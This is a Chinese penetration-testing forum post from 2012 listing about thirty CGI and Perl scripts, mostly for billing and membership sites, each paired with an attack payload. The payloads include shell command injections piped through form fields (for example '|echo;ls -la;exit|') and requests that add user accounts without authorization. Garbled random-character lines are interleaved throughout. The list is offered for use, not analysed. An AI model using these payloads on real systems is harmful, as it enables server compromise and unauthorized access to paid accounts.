中国网络渗透测试联盟
标题:
Cgi-bin 30个漏洞+使用方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:55
标题:
Cgi-bin 30个漏洞+使用方法
==============================
7 X7 x; S- c0 N7 n8 K
+ l2 m" i2 \0 U* b' n
/smspass.pl
' l3 a' D! }* |+ o" q
username=username&password=password
4 A$ r5 o/ w; }, Z! V
1 q" I& ^! I# C) o
/index.cgi
r6 x1 }! l5 I5 f8 Y% \ P
wei=ren&gen=command
4 i& w% F% L2 z
0 h+ V( d5 J, P
/passmaster.cgi
/ ^$ B) n8 `9 e" s9 [) e' [
Action=Add&Username=Username&Password=Password
% C* ?; D* G( h/ B; z2 Q
0 c# Z7 n5 h! e5 j* u
/accountcreate.cgi
" w9 q6 |2 E2 S/ K0 I _
username=username&password=password&ref1=|echo;ls|
% P: d5 @+ l: l! ]5 H. @
3 F* _6 I/ X& ]/ @) D, b
/form.cgi
) d2 J7 U7 o0 B, T* i/ Q
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
5 @! q7 p x o, g! q- k! k
: R: T- }' z* f
/addusr.pl
! O- c7 X, A0 q+ W/ Y. F" X
/cgi-bin/EuroDebit/addusr.pl
. w. \, N5 \. g. h8 |
user=username&pass=Password&confirm=Password
& F, G. X3 \, _ f6 `5 U( m& r( M
+ H% v, f+ u" F6 \8 u( v1 S+ e
/ccbill-local.asp
1 Z: {# K& y- L* K" ?- d3 T1 K0 p
post_values=username:password
6 S" S3 m5 \9 `# t, `. v$ i4 D
4 d& ~" x& |0 P! X& r+ g! H
/count.cgi
; }$ L1 o/ u C9 [0 v1 [& L* }6 U
pinfile=|echo;ls -la;exit|
: l9 x# \$ e6 A8 h! j6 Q
/ ~' A5 R; k4 ?* Z. e1 ~
/recon.cgi
5 p; y- ]% @: p3 c% g& I
/recon.cgi?search
" j: a$ ^+ i9 D; q/ ^* b( C R
searchoption=1&searchfor=|echo;ls -al;exit|
Z" `8 h* l6 t3 I
5 `9 e: N# o$ J! a* M
/verotelrum.pl
( h3 ~1 T9 H& Z2 N4 `
vercode=username:password:dseegsow:add:amount<&30>
. s9 ^9 |- Q# e. G: Y0 x h
6 W( F) |- c& O6 G7 h( V1 ?' f
/af.cgi
4 l% \' a7 M4 q" `! p7 ^
_browser_out=|echo;ls -la;exit;|
4 \, [4 x, W( i* M9 V: s# Y; X6 Z
7 S& s; w$ Q$ j
/modify.cgi
' t# W5 d# l T$ H
username=username&password=password&expire=30
5 r, I5 f! u1 X6 c) g
/ Q7 Y3 y! J6 f5 e. r! y, d/ _
/openjournal.cgi
, x6 \& ]) t) h' m. D E+ Q$ `: K
edit=1&ct=2&go=|echo;ls -al;exit|
, L" {5 M7 F9 {
% Y# K5 }) |& _
/gx9passwd.cgi
! K9 d7 K# {# n4 m
cmd=ADD&user=username&pass=password
6 U; e1 q% O; S# O: n
% u, v1 y* K0 J* Y, W- |0 C
/probecontrol.cgi
, A9 G* k" |# [% m# ?; H5 e3 p6 J( Z
command=enable&username=username&password=password
) y+ |* \" I# d5 {
% T6 @" {, Q$ d6 u b E" B ~
/recon.cgi
- ], L& j/ P7 N1 n d
searchoption=3&searchfor=echo;ls -la;exit
4 F& e. Q" g& W K
# Z3 C% X3 T: z U
/htadd.pl
" l4 O2 v6 v- Z. P; s+ A8 W" e; R G
configfile=|echo; ls -alt; exit
8 Y8 s( s# S& @: V5 Z7 O6 x7 I
3 r/ p+ e& s# G2 d
/gx9passwd.cgi
& I) y, ~9 D4 k3 O7 ^/ d
cmd=ADD&user=username&pass=password
; y |' c* h/ X
/ e" t/ E% {- ]
/ibill*.pl
8 r, p" z+ @8 A1 c# |) F9 ?5 q
reqtype=add&authpwd=authpwd&username=username&password=password
/ g2 i. `; g# m7 T$ _$ s. @: ]
& f, B8 S. Z* m' T- [
/cpay.cgi
# k9 W/ W' o. E8 ]' [$ \# m8 D
command=add_member&username=username(EMAIL)&password=password(DES)
6 o2 n- H" ~4 J/ \& C
2 V m* W+ B1 \# m, [, e$ l
/globill_ut.cgi
8 z' e7 Z! A* ?
do=add&username=username&password=password&wpassword=password
8 l: F0 b4 w. w& T" v! F% y0 h
& L' m6 ?3 F' d2 L$ s* A. k
/usercontrol.cgi
6 ]+ w2 w3 q( G% i/ l7 X
command=enable&username=USER&password=PASS
9 p$ d$ y R# K+ ?4 }. N' j
& G3 ]5 t- c& O7 Y; r9 l( I
/globoSALErum.cgi
. t9 e4 d5 J) } j: i' d
action=ADD&seccode=seccode&login=username&password=password
, H2 A( @! d, h
7 k. }; @9 I) v7 b+ ^% W7 h
/addusr.pl
. R, [. x# f; L9 m
user=USER&pass=PASS&confirm=PASS
0 t5 B6 C0 w& j' Y8 b7 E2 ]
0 f9 g% x) N0 K7 n5 E
/pincount.cgi
6 f; C1 X: z2 E( K# f3 g% B0 @" R
/cgi-bin/mastergate/pincount.cgi
* p9 G* N. S0 v8 r4 C
pinfile=|echo;pwd;exit|
h0 v7 T$ {% q# o
0 Z& h5 B7 r7 ^/ _ S! i& B, l
/accountcreate.cgi
a! O1 H% u) @/ ~& f
/cgi-bin/gateway/accountcreate.cgi
) I8 g# j H3 p+ i
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
, L( l: }) T4 h5 [/ V
: K2 I. L n- j, `6 H, r
/af.cgi
6 V# u% e' V6 b9 C
/env.cgi
1 S& @2 b U% }1 {- ]
ADD+;echo;pwd;exit
/ z! L" c ]6 j( j0 \0 f$ S5 Q5 n
4 f5 ? x! K; P7 R
/count.cgi
3 [ q0 z6 |; K* E P5 J. {
pinfile=|echo;pwd;exit|
: O# z# C! N6 P* O7 \2 m) g
- o0 U8 Y# @: F% d) V0 l I/ P
/recon.cgi
4 d2 p' N) A8 Q1 b4 C! u
searchoption=1&searchfor=|echo;ls%20-al;exit|
5 D* D$ P I# @! m
8 ?0 _4 `/ i- h3 R
/add.cgi
2 T7 `& b: I* P
username=username&password=password&expire=30
$ j- p0 @- P. u3 x0 {) p
- U* D/ F7 Z$ ]( ?; d
==============================
$ a; O c) D7 [/ l) l1 Z+ o; W6 P6 ^
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2